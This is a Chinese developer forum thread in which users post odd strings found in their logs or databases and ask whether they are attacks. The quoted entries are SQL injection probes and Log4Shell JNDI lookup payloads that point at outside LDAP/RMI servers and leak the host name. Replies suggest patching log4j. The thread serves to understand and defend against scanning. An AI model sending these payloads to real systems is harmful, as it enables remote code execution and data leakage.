出现很多下面的乱码
oPt8w5a7jrXzDoGVQVENoo5GInk4
opt8w5a7jrxzdogvqvenoo5gink4' union 1--
opt8w5a7jrxzdogvqvenoo5gink4' union 1,2--
AND (SELECT*FROM(SELECT(SLEEP(3)))dovm) limi
${jndi:rmi://9.4.131.68:1099/bypass7d616399cd
${jndi:rmi://101.91.62.170:1099/bypass24039a6
${jndi:ldap://hostname-${hostName}.username-$
${jndi:ldap://101.91.62.170:1389/jdk1889905e3
${jndi:ldap://9.4.131.68:1389/jdk18ded425cbb6
这个是微信安全团队的测试
$_GET = [
'select' => '${jndi:ldap://183.47.120.213:1389/jdk18fdafcc6c9d4e2565049a58624811fb03-/-${hostName}}'
]
$_SERVER = [
'HTTP_USER_AGENT' => 'Tencent Security Team, more information: https://developers.weixin.qq.com/community/minihome/doc/0008ea401c89c02cff2d1345051001 (66a840605d716bd8fc227a37a4db) f6a6'
我也出现过好几次,9.4.131.68我查IP还是美国的,一开始没有在意,我觉得是我代码的bug就不停删,后来数据测试没问题,增删改查也没有出现这一堆sql代码的数据,直到我发现了这个IP。。。
请问一下,这种攻击会影响数据库吗,为什么会出现这种攻击嘞。。。
你解决了吗 还攻击吗 我的也是这两个ip 进行了好向天的攻击 想利用 log4j的漏洞 需要把 log4j的漏洞给修复 我的修复完之后 刚上来一个劲攻击 后来就没有再攻击了
攻击而已
请问知道是什么原因吗
这不是乱码,sql报错了吧